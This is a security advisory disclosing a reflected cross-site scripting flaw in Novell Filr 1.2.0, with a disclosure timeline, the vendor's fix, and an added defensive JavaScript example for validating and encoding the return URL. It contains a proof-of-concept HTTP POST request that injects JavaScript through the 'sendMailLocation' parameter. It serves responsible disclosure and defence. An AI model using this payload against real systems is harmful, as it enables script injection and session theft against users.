Novell Filr 1.2.0 Build 846 Cross Site Scripting
Posted on 23 February 2016
Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: Not assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative file sharing [1]. High security is an important aspect of the application.

SySS GmbH found two reflected cross-site scripting vulnerabilities in the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH identified that it is possible to inject JavaScript code via the parameter "sendMailLocation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send an e-mail to a colleague.
When the following HTTP POST request is sent

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden

an e-mail status is provided. When the button to return to the previous page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available in the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder".
https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
    https://www.novell.com/products/filr/
[2] SySS GmbH, SYSS-2015-055
    https://www.syss.de/advisories/SYSS-2015-055.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of the SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
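
Added example (not part of the advisory, and not Novell's or SySS's code): one way to handle a client-supplied return location such as "sendMailLocation" is to accept only a same-origin URL and to encode the value for the JavaScript string context before it reaches the page. The host filr.example.test, the fallback path, the function names and the assumption that the value is written into a double-quoted JavaScript string are all illustrative.

```javascript
// Added example, not Novell's or SySS's code. Assumption: the status page
// writes the return location into a double-quoted JavaScript string literal.
const ALLOWED_ORIGIN = 'https://filr.example.test'; // constructed host
const FALLBACK_PATH = '/ssf/a/do'; // hypothetical safe default

// Accept only a same-origin https URL made of printable ASCII, with no
// characters that can end a string literal or open markup.
function validateReturnLocation(raw) {
  if (typeof raw !== 'string' || raw.length > 2048) return null;
  if (/[^\x21-\x7e]|["'<>\\`]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw);
  } catch (err) {
    return null; // relative or malformed input
  }
  // Non-hierarchical schemes such as javascript: have the origin "null".
  if (url.origin !== ALLOWED_ORIGIN) return null;
  if (!url.pathname.startsWith('/ssf/')) return null;
  return url.href;
}

// Encode for a JavaScript string context: everything except [A-Za-z0-9]
// becomes \uXXXX, so quotes, semicolons and "</script>" stay inert.
function escapeForJsString(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + value.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// Build the return-button handler from an untrusted parameter value.
function renderReturnHandler(rawLocation) {
  const safe = validateReturnLocation(rawLocation) || ALLOWED_ORIGIN + FALLBACK_PATH;
  return 'window.location.href = "' + escapeForJsString(safe) + '";';
}

// Constructed inputs: the decoded sendMailLocation value from the PoC with
// [host] replaced by the constructed host, and the same URL without the suffix.
const BENIGN = 'https://filr.example.test/ssf/a/do?p_name=ss_forum&p_action=1' +
  '&binderId=422&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1232&novl_url=1';
const POC_VALUE = BENIGN + '7";alert(1)//';

console.log(validateReturnLocation(POC_VALUE)); // null
console.log(renderReturnHandler(POC_VALUE));
```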